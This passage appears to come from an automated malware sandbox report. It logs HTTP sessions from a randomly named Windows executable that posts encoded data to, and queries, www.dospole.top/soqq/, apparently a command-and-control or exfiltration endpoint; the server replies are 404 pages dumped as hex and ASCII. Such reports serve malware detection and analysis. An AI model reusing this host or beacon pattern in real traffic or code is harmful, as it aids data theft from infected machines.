                                                      Data Ascii: 1;" /> <path id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-
                                                      Jul 9, 2024 12:10:14.386137009 CEST1236INData Raw: 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72
                                                      Data Ascii: ll-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567"
                                                      Jul 9, 2024 12:10:14.391256094 CEST1236INData Raw: 2c 30 2e 31 31 38 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65
                                                      Data Ascii: ,0.1183" style="fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4578-1"


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      30192.168.2.949745162.254.38.56805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:10:16.382255077 CEST844OUTPOST /soqq/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.dospole.top
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.dospole.top
                                                      Referer: http://www.dospole.top/soqq/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 51 70 6d 76 72 31 36 34 53 59 42 43 34 69 67 6a 57 46 5a 2b 4b 4e 79 36 77 4a 54 6c 44 4d 34 59 30 65 66 2f 45 74 75 6e 5a 69 33 58 44 73 74 2b 72 78 70 4e 52 38 4d 31 58 59 2f 37 31 45 41 39 53 69 77 79 43 4a 34 51 4a 4f 43 6d 47 79 2f 75 36 54 2f 56 77 71 78 4a 66 55 2b 33 58 6d 34 71 59 42 56 50 4e 68 51 6b 70 76 49 48 41 79 33 44 78 52 34 75 7a 63 75 52 78 5a 43 53 57 48 53 6c 55 75 39 73 42 4b 35 34 67 76 49 44 66 47 6b 41 7a 31 6d 76 65 58 6c 36 61 33 72 51 62 57 4c 2f 69 4e 64 49 79 7a 55 56 47 65 75 30 51 63 38 71 62 38 33 4b 69 4e 65 53 55 78 42 6c 50 4b 51 4b 53 61 6a 37 6d 4a 35 74 5a 43 6b 54 71 5a 6c 6c 74 41 3d 3d
                                                      Data Ascii: lv-=Qpmvr164SYBC4igjWFZ+KNy6wJTlDM4Y0ef/EtunZi3XDst+rxpNR8M1XY/71EA9SiwyCJ4QJOCmGy/u6T/VwqxJfU+3Xm4qYBVPNhQkpvIHAy3DxR4uzcuRxZCSWHSlUu9sBK54gvIDfGkAz1mveXl6a3rQbWL/iNdIyzUVGeu0Qc8qb83KiNeSUxBlPKQKSaj7mJ5tZCkTqZlltA==
                                                      Jul 9, 2024 12:10:16.950479031 CEST1236INHTTP/1.1 404 Not Found
                                                      Date: Tue, 09 Jul 2024 10:10:16 GMT
                                                      Server: Apache
                                                      Content-Length: 16052
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                      Jul 9, 2024 12:10:16.950509071 CEST224INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                      Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                                                      Jul 9, 2024 12:10:16.950525999 CEST1236INData Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69
                                                      Data Ascii: style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d="m 145.0586,263.51309 c -90.20375,-0.0994 -119.20375,-0.0994 -119.20375,-0.09
                                                      Jul 9, 2024 12:10:16.950541973 CEST1236INData Raw: 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 34 39 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22
                                                      Data Ascii: ;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0.18258 c -1.914603,-0.23621 -3.505591,1.17801 -4.861444,2.68113 -1.355853,1.5
                                                      Jul 9, 2024 12:10:16.950557947 CEST1236INData Raw: 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 31 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 37 34 2e 36 38 37 35 2c 31 32 35 2e 30 33 37
                                                      Data Ascii: ;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.3433 -18.781379,20.01048 -5.583823,6.66719 -10.749655,13.66605 -13.
                                                      Jul 9, 2024 12:10:16.950575113 CEST672INData Raw: 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a
                                                      Data Ascii: #000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.22912 11.6978
                                                      Jul 9, 2024 12:10:16.951143026 CEST1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                                      Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                                      Jul 9, 2024 12:10:16.951159954 CEST224INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                                      Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.0
                                                      Jul 9, 2024 12:10:16.951175928 CEST1236INData Raw: 30 33 34 32 39 2c 33 37 2e 31 38 31 35 39 20 2d 33 2e 30 36 34 31 35 34 2c 35 34 2e 38 36 30 33 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74
                                                      Data Ascii: 03429,37.18159 -3.064154,54.86032" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206
                                                      Jul 9, 2024 12:10:16.951191902 CEST224INData Raw: 2e 32 33 32 36 36 20 63 20 2d 35 2e 34 34 30 31 39 32 2c 31 31 2e 35 36 32 35 31 20 2d 31 30 2e 38 38 30 39 35 31 2c 32 33 2e 31 32 36 32 32 20 2d 31 35 2e 38 39 39 36 35 37 2c 33 33 2e 35 36 33 36 38 20 2d 35 2e 30 31 38 37 30 36 2c 31 30 2e 34
                                                      Data Ascii: .23266 c -5.440192,11.56251 -10.880951,23.12622 -15.899657,33.56368 -5.018706,10.43747 -9.614414,19.74672 -11.912808,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.0660
                                                      Jul 9, 2024 12:10:16.955658913 CEST1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                      Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      31192.168.2.949746162.254.38.56805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:10:18.963701010 CEST1857OUTPOST /soqq/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.dospole.top
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.dospole.top
                                                      Referer: http://www.dospole.top/soqq/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 51 70 6d 76 72 31 36 34 53 59 42 43 34 69 67 6a 57 46 5a 2b 4b 4e 79 36 77 4a 54 6c 44 4d 34 59 30 65 66 2f 45 74 75 6e 5a 69 2f 58 44 65 6c 2b 35 47 56 4e 51 38 4d 31 64 34 2f 2b 31 45 42 34 53 69 6f 2b 43 4a 38 71 4a 4d 4b 6d 41 55 6a 75 39 68 58 56 36 71 78 4a 58 30 2b 32 4b 32 35 67 59 43 39 4c 4e 68 41 6b 70 76 49 48 41 78 76 44 68 77 34 75 6f 63 75 51 6e 4a 43 6f 53 48 54 4d 55 75 6c 47 42 4b 74 4f 67 66 6f 44 63 6c 63 41 31 41 79 76 42 6e 6c 38 62 33 71 57 62 57 32 2f 69 4e 52 2b 79 32 70 43 47 5a 69 30 54 35 64 52 41 50 54 4c 39 4e 6d 7a 57 44 67 43 44 64 74 6f 58 6f 58 37 38 4a 56 74 5a 79 78 37 69 64 4d 74 37 4b 35 58 4c 6f 69 6f 43 44 71 6a 78 57 42 64 43 58 53 6c 6c 64 52 6c 52 59 54 41 68 4c 46 38 50 31 5a 38 46 44 6b 70 66 68 45 6e 50 76 78 42 54 6f 53 56 55 65 32 53 37 31 45 34 52 44 48 38 39 34 52 58 4e 5a 39 31 75 66 76 64 32 76 34 2b 37 58 44 72 56 62 69 58 57 41 4f 65 37 39 6b 7a 61 34 6e 50 6e 73 65 6e 65 4b 38 55 59 32 67 30 76 31 73 37 6a 64 78 56 6d 70 31 75 44 34 [TRUNCATED]
                                                      Data Ascii: lv-=Qpmvr164SYBC4igjWFZ+KNy6wJTlDM4Y0ef/EtunZi/XDel+5GVNQ8M1d4/+1EB4Sio+CJ8qJMKmAUju9hXV6qxJX0+2K25gYC9LNhAkpvIHAxvDhw4uocuQnJCoSHTMUulGBKtOgfoDclcA1AyvBnl8b3qWbW2/iNR+y2pCGZi0T5dRAPTL9NmzWDgCDdtoXoX78JVtZyx7idMt7K5XLoioCDqjxWBdCXSlldRlRYTAhLF8P1Z8FDkpfhEnPvxBToSVUe2S71E4RDH894RXNZ91ufvd2v4+7XDrVbiXWAOe79kza4nPnseneK8UY2g0v1s7jdxVmp1uD4G41YktmZ6A9mJtNDJrB3GZwSwqPe0/zHMH94vwRwABh5L9Q+gGloz3oKBcjeNHxuzvo2aOWIC/Mx33g70CzPF7XFjmGR9P6R2Wqg8ItmTczMiksYDvPEs1KmMYbu+AeagWZPzGY7AdGJLNJgUJsc78NxMPI36GzPf8K1YQDBUwBYQbQKa7OFn8CWWSWci5+m9LFtcQBU7f8o0/RW7ipXD5ET8RDNmnRBfgsFMmBk7QadkOAADjOv7uNoj2VIpyHtbiwGoomNEojXRx51CBSSPniptZ51j2xpqbW1G4+/hsZuHbJzv8ZHgZxPr/98cpJKt1JuzaHSlekoOwrWgo41pgJd0j0ZkqR7sWjgcn32BNdb9VczaxY1eLBHrEhJex7pDl9WpmW8QbvYTqqXkYGxRBYCJlZXer798dOM8DHji6O8wzm0sGKFH6WziysvWHGi6tMpIRvYaoNdyfSHzUkz8bLfSha2ui6cSMjNxuxuNGfS06dOD/NMOHfx2mekvegRDvo0QikNdAZfYzyxyay/Ka4dPXIeg/QegZUBQ6dcyORzMQMWF/QYFNBSggZmSWoJMANWHgcYfIpV0ziUG7SvHVSTUZce3aOCZl2u1D0LQUImpX/1hb5CAFOhnXg3wf/rdJZiXpxdUWsLzzmqOaPlnLm4Iu9PLvO7RX [TRUNCATED]
                                                      Jul 9, 2024 12:10:19.623357058 CEST1236INHTTP/1.1 404 Not Found
                                                      Date: Tue, 09 Jul 2024 10:10:19 GMT
                                                      Server: Apache
                                                      Content-Length: 16052
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                      Jul 9, 2024 12:10:19.623385906 CEST1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                      Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                      Jul 9, 2024 12:10:19.623403072 CEST448INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                      Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                      Jul 9, 2024 12:10:19.623419046 CEST1236INData Raw: 36 38 31 31 33 20 2d 31 2e 33 35 35 38 35 33 2c 31 2e 35 30 33 31 32 20 2d 32 2e 34 37 33 37 36 34 2c 33 2e 30 39 31 37 33 20 2d 33 2e 33 38 37 38 36 36 2c 34 2e 35 39 35 33 38 20 2d 30 2e 39 31 34 31 30 33 2c 31 2e 35 30 33 36 35 20 2d 31 2e 36
                                                      Data Ascii: 68113 -1.355853,1.50312 -2.473764,3.09173 -3.387866,4.59538 -0.914103,1.50365 -1.620209,2.91586 -2.416229,4.41952 -0.79602,1.50365 -1.67928,3.09352 -0.808656,3.24054 0.870624,0.14702 3.490408,-1.14815 5.700074,-1.91396 2.209666,-0.76581 4.0014
                                                      Jul 9, 2024 12:10:19.623435974 CEST1236INData Raw: 34 39 36 35 35 2c 31 33 2e 36 36 36 30 35 20 2d 31 33 2e 39 31 36 36 30 38 2c 31 38 2e 37 34 39 36 20 2d 33 2e 31 36 36 39 35 32 2c 35 2e 30 38 33 35 35 20 2d 34 2e 33 33 33 34 33 32 2c 38 2e 32 34 39 37 31 20 2d 34 2e 37 35 30 33 31 35 2c 31 31
                                                      Data Ascii: 49655,13.66605 -13.916608,18.7496 -3.166952,5.08355 -4.333432,8.24971 -4.750315,11.08369 -0.416883,2.83399 -0.08368,5.33304 1.809372,16.25302 1.893048,10.91998 5.343489,30.24673 9.760132,48.66349 4.416642,18.41676 9.798356,35.91675 15.180267,5
                                                      Jul 9, 2024 12:10:19.623451948 CEST1236INData Raw: 37 38 36 2c 36 2e 32 32 39 31 32 20 31 31 2e 36 39 37 38 39 2c 31 32 2e 32 32 39 31 34 20 31 37 2e 31 31 34 35 36 2c 31 38 2e 33 39 35 38 31 20 35 2e 34 31 36 36 36 2c 36 2e 31 36 36 36 37 20 31 30 2e 37 34 39 39 36 2c 31 32 2e 34 39 39 39 35 20
                                                      Data Ascii: 786,6.22912 11.69789,12.22914 17.11456,18.39581 5.41666,6.16667 10.74996,12.49995 14.74993,17.91655 3.99997,5.41659 6.66659,9.91653 7.16671,17.83316 0.50012,7.91664 -1.16644,19.24921 -3.3502,31.24619 -2.18376,11.99698 -4.81616,24.33632 -8.4206
                                                      Jul 9, 2024 12:10:19.623469114 CEST672INData Raw: 33 2c 32 33 2e 38 30 36 34 37 20 2d 30 2e 35 33 30 33 34 2c 31 34 2e 31 34 33 33 38 20 2d 32 2e 38 38 37 30 36 2c 33 36 2e 35 33 32 32 36 20 2d 35 2e 34 32 30 39 2c 35 36 2e 34 34 39 35 31 20 2d 32 2e 35 33 33 38 33 2c 31 39 2e 39 31 37 32 35 20
                                                      Data Ascii: 3,23.80647 -0.53034,14.14338 -2.88706,36.53226 -5.4209,56.44951 -2.53383,19.91725 -5.24428,37.35836 -7.95503,54.80146" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;strok
                                                      Jul 9, 2024 12:10:19.623610020 CEST1236INData Raw: 30 33 34 32 39 2c 33 37 2e 31 38 31 35 39 20 2d 33 2e 30 36 34 31 35 34 2c 35 34 2e 38 36 30 33 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74
                                                      Data Ascii: 03429,37.18159 -3.064154,54.86032" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206
                                                      Jul 9, 2024 12:10:19.623625994 CEST1236INData Raw: 2e 32 33 32 36 36 20 63 20 2d 35 2e 34 34 30 31 39 32 2c 31 31 2e 35 36 32 35 31 20 2d 31 30 2e 38 38 30 39 35 31 2c 32 33 2e 31 32 36 32 32 20 2d 31 35 2e 38 39 39 36 35 37 2c 33 33 2e 35 36 33 36 38 20 2d 35 2e 30 31 38 37 30 36 2c 31 30 2e 34
                                                      Data Ascii: .23266 c -5.440192,11.56251 -10.880951,23.12622 -15.899657,33.56368 -5.018706,10.43747 -9.614414,19.74672 -11.912808,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.23791
                                                      Jul 9, 2024 12:10:19.623641968 CEST1236INData Raw: 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 36 31 34 31 35 34 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72
                                                      Data Ascii: :inline;fill:none;stroke:#000000;stroke-width:1.00614154px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.
                                                      Jul 9, 2024 12:10:19.628585100 CEST1236INData Raw: 20 20 63 79 3d 22 31 36 34 2e 35 37 31 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 33 32 31 2e 34 32 32 32 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 36 35 22 0a 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: cy="164.5713" cx="321.42224" id="path4565" style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      32192.168.2.949747162.254.38.56805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:10:21.548355103 CEST563OUTGET /soqq/?GJtTF=-FH8yJw&lv-=drOPoC+fcqVNsUc6VHZGLsfUz53xK80s09TfdoGgIRC+cuJysSYyQ9s+Q6Hx730bczsRaNUrXI+2DBjO7h7kx7woR32YUW8PWQ95aiNipO8bO2C7yA== HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.dospole.top
                                                      Connection: close
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:10:22.168304920 CEST1236INHTTP/1.1 404 Not Found
                                                      Date: Tue, 09 Jul 2024 10:10:22 GMT
                                                      Server: Apache
                                                      Content-Length: 16052
                                                      Connection: close
                                                      Content-Type: text/html; charset=utf-8
